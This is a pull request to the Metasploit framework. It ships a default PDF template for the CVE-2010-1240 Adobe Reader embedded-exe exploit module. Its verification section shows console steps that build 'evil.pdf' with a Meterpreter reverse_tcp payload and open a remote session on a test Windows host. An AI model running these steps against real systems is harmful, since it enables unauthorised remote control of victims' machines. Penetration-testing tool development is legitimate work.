### PR TITLE
Fix #4134 - Add a default template for CVE-2010-1240 PDF exploit

### DIFF
--- a/data/exploits/CVE-2010-1240/template.pdf
+++ b/data/exploits/CVE-2010-1240/template.pdf
@@ -1,0 +1,55 @@
+%PDF-1.0
+1 0 obj
+<<
+	/Pages 2 0 R
+	/Type /Catalog
+>>
+endobj
+2 0 obj
+<<
+	/Count 1
+	/Kids [ 3 0 R ]
+	/Type /Pages
+>>
+endobj
+3 0 obj
+<<
+	/Contents 4 0 R
+	/Parent 2 0 R
+	/Resources <<
+		/Font <<
+			/F1 <<
+				/Type /Font
+				/Subtype /Type1
+				/BaseFont /Helvetica
+				/Name /F1
+			>>
+		>>
+	>>
+	/Type /Page
+	/MediaBox [ 0 0 795 842 ]
+>>
+endobj
+4 0 obj
+<<
+	/Length 0
+>>stream
+
+endstream
+endobj
+xref
+0 5
+0000000000 65535 f
+0000000010 00000 n
+0000000067 00000 n
+0000000136 00000 n
+0000000373 00000 n
+trailer
+<<
+	/Root 1 0 R
+	/Size 5
+	/Info 0 0
+>>
+startxref
+429
+%%EOF

--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('INFILENAME', [ true, 'The Input PDF filename.']),
+        OptPath.new('INFILENAME', [ true, 'The Input PDF filename.', ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-1240', 'template.pdf') ]),
         OptString.new('EXENAME', [ false, 'The Name of payload exe.']),
         OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']),
         OptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area',


### PR DESCRIPTION
This is for https://github.com/rapid7/metasploit-framework/issues/4134

This is actually quite a common problem for people who want to use the adobe_pdf_embedded_exe.rb exploit: They supply a template, it's missing something in the "trailer" dictionary (maybe the size, root, or info), and then basically the module refuses to generate the exploit. So to solve this (which is like the second time for me already), instead of telling them to try a different template, I've decided to just ship a default one that works. If they want, they can also just modify the template.
## Verification
- [x] Download Adobe PDF 9: http://download.oldapps.com/Adobe_Reader/AdbeRdr90_en_US.exe
- [x] Install the Adobe Reader on a Windows box. Win XP or Win 7 should be fine. I've tested on those two.
- [x] Follow the steps below:

```
$ ./msfconsole -q
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > run

[*] Reading in '/msf/data/exploits/CVE-2010-1240/template.pdf'...
[*] Parsing '/msf/data/exploits/CVE-2010-1240/template.pdf'...
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Parsing Successful. Creating 'evil.pdf' file...
[+] evil.pdf stored at /Users/sinn3r/.msf4/local/evil.pdf
msf exploit(adobe_pdf_embedded_exe) > back
msf > use exploit/multi/handler 
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.80:1304) at 2014-11-05 17:08:17 -0600

meterpreter >
```
